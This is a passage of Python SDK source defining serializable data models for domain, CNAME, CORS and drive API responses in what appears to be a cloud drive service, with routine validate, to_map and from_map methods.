        self.cname_status = cname_status
        # CName type.
        self.cname_type = cname_type
        # Domain ID.
        self.domain_id = domain_id
        # Whether this is a VPC CName.
        self.is_vpc = is_vpc

    def validate(self):
        # The nested status validates itself; domain_id is the only required scalar.
        if self.cname_status:
            self.cname_status.validate()
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        """Serialize non-None fields into a dict, recursing into the nested status."""
        result = dict()
        for name in self._FIELD_NAMES:
            value = getattr(self, name)
            if value is None:
                continue
            if name == 'cname_status':
                value = value.to_map()
            result[name] = value
        return result

    def from_map(self, m: dict = None):
        """Populate from *m*; absent or None keys are skipped."""
        m = m or dict()
        for name in self._FIELD_NAMES:
            value = m.get(name)
            if value is None:
                continue
            if name == 'cname_status':
                value = CNameStatus().from_map(value)
            setattr(self, name, value)
        return self
class GetDomainResponse(TeaModel):
    """
    get domain response

    Full domain configuration: CNAME endpoints, third-party authentication
    settings (Alipay / DingTalk / RAM), MNS event-notification settings,
    auto-initialized drive settings, and storage options.
    """
    def __init__(
        self,
        api_cname: str = None,
        app_cname: str = None,
        auth_alipay_app_id: str = None,
        auth_alipay_enable: bool = None,
        auth_alipay_private_key: str = None,
        auth_cname: str = None,
        auth_config: dict = None,
        auth_dingding_app_id: str = None,
        auth_dingding_app_secret: str = None,
        auth_dingding_enable: bool = None,
        auth_endpoint_enable: bool = None,
        auth_ram_app_id: str = None,
        auth_ram_app_secret: str = None,
        auth_ram_enable: bool = None,
        created_at: str = None,
        data_hash_name: str = None,
        description: str = None,
        domain_id: str = None,
        domain_name: str = None,
        event_filename_matches: str = None,
        event_mns_endpoint: str = None,
        event_mns_topic: str = None,
        event_names: List[str] = None,
        event_role_arn: str = None,
        init_drive_enable: bool = None,
        init_drive_size: int = None,
        init_drive_store_id: str = None,
        mode: str = None,
        path_type: str = None,
        published_app_access_strategy: AppAccessStrategy = None,
        sharable: bool = None,
        store_level: str = None,
        store_region_list: List[str] = None,
        updated_at: str = None,
    ):
        # Domain APICName
        self.api_cname = api_cname
        # Domain AppCName
        self.app_cname = app_cname
        # Alipay app ID
        self.auth_alipay_app_id = auth_alipay_app_id
        # whether Alipay authentication is enabled
        self.auth_alipay_enable = auth_alipay_enable
        # Alipay app secret (stored as the private key)
        self.auth_alipay_private_key = auth_alipay_private_key
        # Domain AuthCName
        self.auth_cname = auth_cname
        # login-related configuration
        self.auth_config = auth_config
        # DingTalk app ID
        self.auth_dingding_app_id = auth_dingding_app_id
        # DingTalk app secret
        self.auth_dingding_app_secret = auth_dingding_app_secret
        # whether DingTalk authentication is enabled
        self.auth_dingding_enable = auth_dingding_enable
        # whether the auth endpoint is enabled -- inferred from field name; verify upstream
        self.auth_endpoint_enable = auth_endpoint_enable
        # RAM app ID
        self.auth_ram_app_id = auth_ram_app_id
        # RAM app secret
        self.auth_ram_app_secret = auth_ram_app_secret
        # whether RAM authentication is enabled
        self.auth_ram_enable = auth_ram_enable
        # domain creation time
        self.created_at = created_at
        # data hash algorithm
        self.data_hash_name = data_hash_name
        # domain description
        self.description = description
        # domain ID
        self.domain_id = domain_id
        # domain name (upstream comment said "description" -- copy/paste slip)
        self.domain_name = domain_name
        # filename match pattern for MNS event notifications
        self.event_filename_matches = event_filename_matches
        # MNS endpoint for event notifications
        self.event_mns_endpoint = event_mns_endpoint
        # MNS topic for event notifications
        self.event_mns_topic = event_mns_topic
        # list of event names
        self.event_names = event_names
        # role ARN used for event notifications
        self.event_role_arn = event_role_arn
        # whether automatic drive initialization is enabled
        self.init_drive_enable = init_drive_enable
        # size of the auto-initialized drive
        self.init_drive_size = init_drive_size
        # store ID used by the auto-initialized drive
        self.init_drive_store_id = init_drive_store_id
        # domain mode (upstream comment: "domain type")
        self.mode = mode
        # domain path type
        self.path_type = path_type
        # access strategy applied to the published app
        self.published_app_access_strategy = published_app_access_strategy
        # whether sharing is enabled
        self.sharable = sharable
        # storage level
        self.store_level = store_level
        # list of storage regions
        self.store_region_list = store_region_list
        # domain last-update time
        self.updated_at = updated_at
    def validate(self):
        # only the nested access strategy requires (recursive) validation
        if self.published_app_access_strategy:
            self.published_app_access_strategy.validate()
    def to_map(self):
        """Serialize to a plain dict, omitting fields that are None."""
        result = dict()
        if self.api_cname is not None:
            result['api_cname'] = self.api_cname
        if self.app_cname is not None:
            result['app_cname'] = self.app_cname
        if self.auth_alipay_app_id is not None:
            result['auth_alipay_app_id'] = self.auth_alipay_app_id
        if self.auth_alipay_enable is not None:
            result['auth_alipay_enable'] = self.auth_alipay_enable
        if self.auth_alipay_private_key is not None:
            result['auth_alipay_private_key'] = self.auth_alipay_private_key
        if self.auth_cname is not None:
            result['auth_cname'] = self.auth_cname
        if self.auth_config is not None:
            result['auth_config'] = self.auth_config
        if self.auth_dingding_app_id is not None:
            result['auth_dingding_app_id'] = self.auth_dingding_app_id
        if self.auth_dingding_app_secret is not None:
            result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
        if self.auth_dingding_enable is not None:
            result['auth_dingding_enable'] = self.auth_dingding_enable
        if self.auth_endpoint_enable is not None:
            result['auth_endpoint_enable'] = self.auth_endpoint_enable
        if self.auth_ram_app_id is not None:
            result['auth_ram_app_id'] = self.auth_ram_app_id
        if self.auth_ram_app_secret is not None:
            result['auth_ram_app_secret'] = self.auth_ram_app_secret
        if self.auth_ram_enable is not None:
            result['auth_ram_enable'] = self.auth_ram_enable
        if self.created_at is not None:
            result['created_at'] = self.created_at
        if self.data_hash_name is not None:
            result['data_hash_name'] = self.data_hash_name
        if self.description is not None:
            result['description'] = self.description
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.domain_name is not None:
            result['domain_name'] = self.domain_name
        if self.event_filename_matches is not None:
            result['event_filename_matches'] = self.event_filename_matches
        if self.event_mns_endpoint is not None:
            result['event_mns_endpoint'] = self.event_mns_endpoint
        if self.event_mns_topic is not None:
            result['event_mns_topic'] = self.event_mns_topic
        if self.event_names is not None:
            result['event_names'] = self.event_names
        if self.event_role_arn is not None:
            result['event_role_arn'] = self.event_role_arn
        if self.init_drive_enable is not None:
            result['init_drive_enable'] = self.init_drive_enable
        if self.init_drive_size is not None:
            result['init_drive_size'] = self.init_drive_size
        if self.init_drive_store_id is not None:
            result['init_drive_store_id'] = self.init_drive_store_id
        if self.mode is not None:
            result['mode'] = self.mode
        if self.path_type is not None:
            result['path_type'] = self.path_type
        if self.published_app_access_strategy is not None:
            result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
        if self.sharable is not None:
            result['sharable'] = self.sharable
        if self.store_level is not None:
            result['store_level'] = self.store_level
        if self.store_region_list is not None:
            result['store_region_list'] = self.store_region_list
        if self.updated_at is not None:
            result['updated_at'] = self.updated_at
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; missing/None keys leave current values untouched."""
        m = m or dict()
        if m.get('api_cname') is not None:
            self.api_cname = m.get('api_cname')
        if m.get('app_cname') is not None:
            self.app_cname = m.get('app_cname')
        if m.get('auth_alipay_app_id') is not None:
            self.auth_alipay_app_id = m.get('auth_alipay_app_id')
        if m.get('auth_alipay_enable') is not None:
            self.auth_alipay_enable = m.get('auth_alipay_enable')
        if m.get('auth_alipay_private_key') is not None:
            self.auth_alipay_private_key = m.get('auth_alipay_private_key')
        if m.get('auth_cname') is not None:
            self.auth_cname = m.get('auth_cname')
        if m.get('auth_config') is not None:
            self.auth_config = m.get('auth_config')
        if m.get('auth_dingding_app_id') is not None:
            self.auth_dingding_app_id = m.get('auth_dingding_app_id')
        if m.get('auth_dingding_app_secret') is not None:
            self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
        if m.get('auth_dingding_enable') is not None:
            self.auth_dingding_enable = m.get('auth_dingding_enable')
        if m.get('auth_endpoint_enable') is not None:
            self.auth_endpoint_enable = m.get('auth_endpoint_enable')
        if m.get('auth_ram_app_id') is not None:
            self.auth_ram_app_id = m.get('auth_ram_app_id')
        if m.get('auth_ram_app_secret') is not None:
            self.auth_ram_app_secret = m.get('auth_ram_app_secret')
        if m.get('auth_ram_enable') is not None:
            self.auth_ram_enable = m.get('auth_ram_enable')
        if m.get('created_at') is not None:
            self.created_at = m.get('created_at')
        if m.get('data_hash_name') is not None:
            self.data_hash_name = m.get('data_hash_name')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('domain_name') is not None:
            self.domain_name = m.get('domain_name')
        if m.get('event_filename_matches') is not None:
            self.event_filename_matches = m.get('event_filename_matches')
        if m.get('event_mns_endpoint') is not None:
            self.event_mns_endpoint = m.get('event_mns_endpoint')
        if m.get('event_mns_topic') is not None:
            self.event_mns_topic = m.get('event_mns_topic')
        if m.get('event_names') is not None:
            self.event_names = m.get('event_names')
        if m.get('event_role_arn') is not None:
            self.event_role_arn = m.get('event_role_arn')
        if m.get('init_drive_enable') is not None:
            self.init_drive_enable = m.get('init_drive_enable')
        if m.get('init_drive_size') is not None:
            self.init_drive_size = m.get('init_drive_size')
        if m.get('init_drive_store_id') is not None:
            self.init_drive_store_id = m.get('init_drive_store_id')
        if m.get('mode') is not None:
            self.mode = m.get('mode')
        if m.get('path_type') is not None:
            self.path_type = m.get('path_type')
        if m.get('published_app_access_strategy') is not None:
            temp_model = AppAccessStrategy()
            self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
        if m.get('sharable') is not None:
            self.sharable = m.get('sharable')
        if m.get('store_level') is not None:
            self.store_level = m.get('store_level')
        if m.get('store_region_list') is not None:
            self.store_region_list = m.get('store_region_list')
        if m.get('updated_at') is not None:
            self.updated_at = m.get('updated_at')
        return self
class GetUserAccessTokenRequest(TeaModel):
    """Request for fetching an access token on behalf of a user."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        role: str = None,
        user_id: str = None,
    ):
        self.headers = headers
        # role
        self.role = role
        # user ID (required)
        self.user_id = user_id
    def validate(self):
        self.validate_required(self.user_id, 'user_id')
    def to_map(self):
        d = dict()
        for attr in ('headers', 'role', 'user_id'):
            value = getattr(self, attr)
            if value is not None:
                d[attr] = value
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        for attr in ('headers', 'role', 'user_id'):
            value = m.get(attr)
            if value is not None:
                setattr(self, attr, value)
        return self
class ListAppsResponse(TeaModel):
    """Paged list of apps plus the cursor for the next batch query."""
    def __init__(
        self,
        items: List[GetAppResponse] = None,
        next_marker: str = None,
    ):
        # list of apps
        self.items = items
        # pagination cursor for the next batch query
        self.next_marker = next_marker
    def validate(self):
        # the item list itself is required; validate each non-empty entry
        self.validate_required(self.items, 'items')
        for entry in self.items or []:
            if entry:
                entry.validate()
    def to_map(self):
        d = dict()
        d['items'] = []
        if self.items is not None:
            d['items'] = [entry.to_map() if entry else None for entry in self.items]
        if self.next_marker is not None:
            d['next_marker'] = self.next_marker
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        self.items = []
        if m.get('items') is not None:
            self.items = [GetAppResponse().from_map(e) for e in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class ListDomainCORSRuleResponse(TeaModel):
    """list domain cors response: CORS rules configured on a domain."""
    def __init__(
        self,
        cors_rule_list: List[CorsRule] = None,
        domain_id: str = None,
    ):
        # list of CORS rules
        self.cors_rule_list = cors_rule_list
        # Domain ID
        self.domain_id = domain_id
    def validate(self):
        # validate each non-empty rule; the list itself is optional
        for rule in self.cors_rule_list or []:
            if rule:
                rule.validate()
    def to_map(self):
        d = dict()
        d['cors_rule_list'] = []
        if self.cors_rule_list is not None:
            d['cors_rule_list'] = [rule.to_map() if rule else None for rule in self.cors_rule_list]
        if self.domain_id is not None:
            d['domain_id'] = self.domain_id
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        self.cors_rule_list = []
        if m.get('cors_rule_list') is not None:
            self.cors_rule_list = [CorsRule().from_map(e) for e in m.get('cors_rule_list')]
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        return self
class ListDomainsResponse(TeaModel):
    """list domain response: a page of domains plus the next-page cursor."""
    def __init__(
        self,
        items: List[BaseDomainResponse] = None,
        next_marker: str = None,
    ):
        # list of domains
        self.items = items
        # cursor for the next page query
        self.next_marker = next_marker
    def validate(self):
        # validate each non-empty entry; the list itself is optional
        for entry in self.items or []:
            if entry:
                entry.validate()
    def to_map(self):
        d = dict()
        d['items'] = []
        if self.items is not None:
            d['items'] = [entry.to_map() if entry else None for entry in self.items]
        if self.next_marker is not None:
            d['next_marker'] = self.next_marker
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        self.items = []
        if m.get('items') is not None:
            self.items = [BaseDomainResponse().from_map(e) for e in m.get('items')]
        if m.get('next_marker') is not None:
            self.next_marker = m.get('next_marker')
        return self
class SetBizCNameCertResponse(TeaModel):
    """Response returned after binding a certificate to a business CNAME."""
    def __init__(
        self,
        biz_cname: str = None,
        cert_name: str = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # business cname
        self.biz_cname = biz_cname
        # certificate name
        self.cert_name = cert_name
        # cname type
        self.cname_type = cname_type
        # domain ID (required)
        self.domain_id = domain_id
        # is vpc
        self.is_vpc = is_vpc
    def validate(self):
        self.validate_required(self.domain_id, 'domain_id')
    def to_map(self):
        d = dict()
        for attr in ('biz_cname', 'cert_name', 'cname_type', 'domain_id', 'is_vpc'):
            value = getattr(self, attr)
            if value is not None:
                d[attr] = value
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        for attr in ('biz_cname', 'cert_name', 'cname_type', 'domain_id', 'is_vpc'):
            value = m.get(attr)
            if value is not None:
                setattr(self, attr, value)
        return self
class SetBizCNameResponse(TeaModel):
    """Response returned after setting a business CNAME on a domain."""
    def __init__(
        self,
        biz_cname: str = None,
        cname_status: CNameStatus = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # business cname
        self.biz_cname = biz_cname
        # nested CNAME status model
        self.cname_status = cname_status
        # cname type
        self.cname_type = cname_type
        # domain ID (required)
        self.domain_id = domain_id
        # is vpc
        self.is_vpc = is_vpc
    def validate(self):
        # cascade into the nested status first, then check the required field
        if self.cname_status:
            self.cname_status.validate()
        self.validate_required(self.domain_id, 'domain_id')
    def to_map(self):
        d = dict()
        if self.biz_cname is not None:
            d['biz_cname'] = self.biz_cname
        if self.cname_status is not None:
            d['cname_status'] = self.cname_status.to_map()
        for attr in ('cname_type', 'domain_id', 'is_vpc'):
            value = getattr(self, attr)
            if value is not None:
                d[attr] = value
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('biz_cname') is not None:
            self.biz_cname = m.get('biz_cname')
        if m.get('cname_status') is not None:
            self.cname_status = CNameStatus().from_map(m['cname_status'])
        for attr in ('cname_type', 'domain_id', 'is_vpc'):
            value = m.get(attr)
            if value is not None:
                setattr(self, attr, value)
        return self
class SetDataCNameResponse(TeaModel):
    """Response returned after setting a data CNAME; all fields are required."""
    def __init__(
        self,
        data_cname: str = None,
        domain_id: str = None,
        location: str = None,
    ):
        # data cname
        self.data_cname = data_cname
        # domain ID
        self.domain_id = domain_id
        # data location
        self.location = location
    def validate(self):
        # every field of this response is mandatory
        for attr in ('data_cname', 'domain_id', 'location'):
            self.validate_required(getattr(self, attr), attr)
    def to_map(self):
        d = dict()
        for attr in ('data_cname', 'domain_id', 'location'):
            value = getattr(self, attr)
            if value is not None:
                d[attr] = value
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        for attr in ('data_cname', 'domain_id', 'location'):
            value = m.get(attr)
            if value is not None:
                setattr(self, attr, value)
        return self
class UpdateDomainResponse(TeaModel):
    """
    update domain response

    NOTE(review): the upstream docstring said "create domain response",
    which contradicts the class name; it carries the same field set as
    GetDomainResponse.
    """
    def __init__(
        self,
        api_cname: str = None,
        app_cname: str = None,
        auth_alipay_app_id: str = None,
        auth_alipay_enable: bool = None,
        auth_alipay_private_key: str = None,
        auth_cname: str = None,
        auth_config: dict = None,
        auth_dingding_app_id: str = None,
        auth_dingding_app_secret: str = None,
        auth_dingding_enable: bool = None,
        auth_endpoint_enable: bool = None,
        auth_ram_app_id: str = None,
        auth_ram_app_secret: str = None,
        auth_ram_enable: bool = None,
        created_at: str = None,
        data_hash_name: str = None,
        description: str = None,
        domain_id: str = None,
        domain_name: str = None,
        event_filename_matches: str = None,
        event_mns_endpoint: str = None,
        event_mns_topic: str = None,
        event_names: List[str] = None,
        event_role_arn: str = None,
        init_drive_enable: bool = None,
        init_drive_size: int = None,
        init_drive_store_id: str = None,
        mode: str = None,
        path_type: str = None,
        published_app_access_strategy: AppAccessStrategy = None,
        sharable: bool = None,
        store_level: str = None,
        store_region_list: List[str] = None,
        updated_at: str = None,
    ):
        # Domain APICName
        self.api_cname = api_cname
        # Domain AppCName
        self.app_cname = app_cname
        # Alipay app ID
        self.auth_alipay_app_id = auth_alipay_app_id
        # whether Alipay authentication is enabled
        self.auth_alipay_enable = auth_alipay_enable
        # Alipay app secret (stored as the private key)
        self.auth_alipay_private_key = auth_alipay_private_key
        # Domain AuthCName
        self.auth_cname = auth_cname
        # login-related configuration
        self.auth_config = auth_config
        # DingTalk app ID
        self.auth_dingding_app_id = auth_dingding_app_id
        # DingTalk app secret
        self.auth_dingding_app_secret = auth_dingding_app_secret
        # whether DingTalk authentication is enabled
        self.auth_dingding_enable = auth_dingding_enable
        # whether the auth endpoint is enabled -- inferred from field name; verify upstream
        self.auth_endpoint_enable = auth_endpoint_enable
        # RAM app ID
        self.auth_ram_app_id = auth_ram_app_id
        # RAM app secret
        self.auth_ram_app_secret = auth_ram_app_secret
        # whether RAM authentication is enabled
        self.auth_ram_enable = auth_ram_enable
        # domain creation time
        self.created_at = created_at
        # data hash algorithm
        self.data_hash_name = data_hash_name
        # domain description
        self.description = description
        # Domain ID
        self.domain_id = domain_id
        # domain name (upstream comment said "description" -- copy/paste slip)
        self.domain_name = domain_name
        # filename match pattern for MNS event notifications
        self.event_filename_matches = event_filename_matches
        # MNS endpoint for event notifications
        self.event_mns_endpoint = event_mns_endpoint
        # MNS topic for event notifications
        self.event_mns_topic = event_mns_topic
        # list of event names
        self.event_names = event_names
        # role ARN used for event notifications
        self.event_role_arn = event_role_arn
        # whether automatic drive initialization is enabled
        self.init_drive_enable = init_drive_enable
        # size of the auto-initialized drive
        self.init_drive_size = init_drive_size
        # store ID used by the auto-initialized drive
        self.init_drive_store_id = init_drive_store_id
        # domain mode (upstream comment: "domain type")
        self.mode = mode
        # domain path type
        self.path_type = path_type
        # access strategy applied to the published app
        self.published_app_access_strategy = published_app_access_strategy
        # whether sharing is enabled
        self.sharable = sharable
        # storage level
        self.store_level = store_level
        # list of storage regions
        self.store_region_list = store_region_list
        # domain last-update time
        self.updated_at = updated_at
    def validate(self):
        # only the nested access strategy requires (recursive) validation
        if self.published_app_access_strategy:
            self.published_app_access_strategy.validate()
    def to_map(self):
        """Serialize to a plain dict, omitting fields that are None."""
        result = dict()
        if self.api_cname is not None:
            result['api_cname'] = self.api_cname
        if self.app_cname is not None:
            result['app_cname'] = self.app_cname
        if self.auth_alipay_app_id is not None:
            result['auth_alipay_app_id'] = self.auth_alipay_app_id
        if self.auth_alipay_enable is not None:
            result['auth_alipay_enable'] = self.auth_alipay_enable
        if self.auth_alipay_private_key is not None:
            result['auth_alipay_private_key'] = self.auth_alipay_private_key
        if self.auth_cname is not None:
            result['auth_cname'] = self.auth_cname
        if self.auth_config is not None:
            result['auth_config'] = self.auth_config
        if self.auth_dingding_app_id is not None:
            result['auth_dingding_app_id'] = self.auth_dingding_app_id
        if self.auth_dingding_app_secret is not None:
            result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
        if self.auth_dingding_enable is not None:
            result['auth_dingding_enable'] = self.auth_dingding_enable
        if self.auth_endpoint_enable is not None:
            result['auth_endpoint_enable'] = self.auth_endpoint_enable
        if self.auth_ram_app_id is not None:
            result['auth_ram_app_id'] = self.auth_ram_app_id
        if self.auth_ram_app_secret is not None:
            result['auth_ram_app_secret'] = self.auth_ram_app_secret
        if self.auth_ram_enable is not None:
            result['auth_ram_enable'] = self.auth_ram_enable
        if self.created_at is not None:
            result['created_at'] = self.created_at
        if self.data_hash_name is not None:
            result['data_hash_name'] = self.data_hash_name
        if self.description is not None:
            result['description'] = self.description
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.domain_name is not None:
            result['domain_name'] = self.domain_name
        if self.event_filename_matches is not None:
            result['event_filename_matches'] = self.event_filename_matches
        if self.event_mns_endpoint is not None:
            result['event_mns_endpoint'] = self.event_mns_endpoint
        if self.event_mns_topic is not None:
            result['event_mns_topic'] = self.event_mns_topic
        if self.event_names is not None:
            result['event_names'] = self.event_names
        if self.event_role_arn is not None:
            result['event_role_arn'] = self.event_role_arn
        if self.init_drive_enable is not None:
            result['init_drive_enable'] = self.init_drive_enable
        if self.init_drive_size is not None:
            result['init_drive_size'] = self.init_drive_size
        if self.init_drive_store_id is not None:
            result['init_drive_store_id'] = self.init_drive_store_id
        if self.mode is not None:
            result['mode'] = self.mode
        if self.path_type is not None:
            result['path_type'] = self.path_type
        if self.published_app_access_strategy is not None:
            result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
        if self.sharable is not None:
            result['sharable'] = self.sharable
        if self.store_level is not None:
            result['store_level'] = self.store_level
        if self.store_region_list is not None:
            result['store_region_list'] = self.store_region_list
        if self.updated_at is not None:
            result['updated_at'] = self.updated_at
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; missing/None keys leave current values untouched."""
        m = m or dict()
        if m.get('api_cname') is not None:
            self.api_cname = m.get('api_cname')
        if m.get('app_cname') is not None:
            self.app_cname = m.get('app_cname')
        if m.get('auth_alipay_app_id') is not None:
            self.auth_alipay_app_id = m.get('auth_alipay_app_id')
        if m.get('auth_alipay_enable') is not None:
            self.auth_alipay_enable = m.get('auth_alipay_enable')
        if m.get('auth_alipay_private_key') is not None:
            self.auth_alipay_private_key = m.get('auth_alipay_private_key')
        if m.get('auth_cname') is not None:
            self.auth_cname = m.get('auth_cname')
        if m.get('auth_config') is not None:
            self.auth_config = m.get('auth_config')
        if m.get('auth_dingding_app_id') is not None:
            self.auth_dingding_app_id = m.get('auth_dingding_app_id')
        if m.get('auth_dingding_app_secret') is not None:
            self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
        if m.get('auth_dingding_enable') is not None:
            self.auth_dingding_enable = m.get('auth_dingding_enable')
        if m.get('auth_endpoint_enable') is not None:
            self.auth_endpoint_enable = m.get('auth_endpoint_enable')
        if m.get('auth_ram_app_id') is not None:
            self.auth_ram_app_id = m.get('auth_ram_app_id')
        if m.get('auth_ram_app_secret') is not None:
            self.auth_ram_app_secret = m.get('auth_ram_app_secret')
        if m.get('auth_ram_enable') is not None:
            self.auth_ram_enable = m.get('auth_ram_enable')
        if m.get('created_at') is not None:
            self.created_at = m.get('created_at')
        if m.get('data_hash_name') is not None:
            self.data_hash_name = m.get('data_hash_name')
        if m.get('description') is not None:
            self.description = m.get('description')
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('domain_name') is not None:
            self.domain_name = m.get('domain_name')
        if m.get('event_filename_matches') is not None:
            self.event_filename_matches = m.get('event_filename_matches')
        if m.get('event_mns_endpoint') is not None:
            self.event_mns_endpoint = m.get('event_mns_endpoint')
        if m.get('event_mns_topic') is not None:
            self.event_mns_topic = m.get('event_mns_topic')
        if m.get('event_names') is not None:
            self.event_names = m.get('event_names')
        if m.get('event_role_arn') is not None:
            self.event_role_arn = m.get('event_role_arn')
        if m.get('init_drive_enable') is not None:
            self.init_drive_enable = m.get('init_drive_enable')
        if m.get('init_drive_size') is not None:
            self.init_drive_size = m.get('init_drive_size')
        if m.get('init_drive_store_id') is not None:
            self.init_drive_store_id = m.get('init_drive_store_id')
        if m.get('mode') is not None:
            self.mode = m.get('mode')
        if m.get('path_type') is not None:
            self.path_type = m.get('path_type')
        if m.get('published_app_access_strategy') is not None:
            temp_model = AppAccessStrategy()
            self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
        if m.get('sharable') is not None:
            self.sharable = m.get('sharable')
        if m.get('store_level') is not None:
            self.store_level = m.get('store_level')
        if m.get('store_region_list') is not None:
            self.store_region_list = m.get('store_region_list')
        if m.get('updated_at') is not None:
            self.updated_at = m.get('updated_at')
        return self
class CreateDriveModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a CreateDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: CreateDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = CreateDriveResponse().from_map(m['body'])
        return self
class DeleteDriveModel(TeaModel):
    """HTTP-layer wrapper for a bodiless delete-drive response (headers only)."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        self.headers = headers
    def validate(self):
        # nothing is required for a header-only response
        pass
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        return self
class GetDriveModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a GetDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = GetDriveResponse().from_map(m['body'])
        return self
class GetDefaultDriveModel(TeaModel):
    """HTTP-layer wrapper for the default-drive lookup: headers plus a GetDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = GetDriveResponse().from_map(m['body'])
        return self
class ListDrivesModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a ListDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = ListDriveResponse().from_map(m['body'])
        return self
class ListMyDrivesModel(TeaModel):
    """HTTP-layer wrapper for the caller's own drive list: headers plus a ListDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = ListDriveResponse().from_map(m['body'])
        return self
class UpdateDriveModel(TeaModel):
    """HTTP-layer wrapper: response headers plus an UpdateDriveResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: UpdateDriveResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = UpdateDriveResponse().from_map(m['body'])
        return self
class CompleteFileModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a HostingCompleteFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingCompleteFileResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = HostingCompleteFileResponse().from_map(m['body'])
        return self
class CopyFileModel(TeaModel):
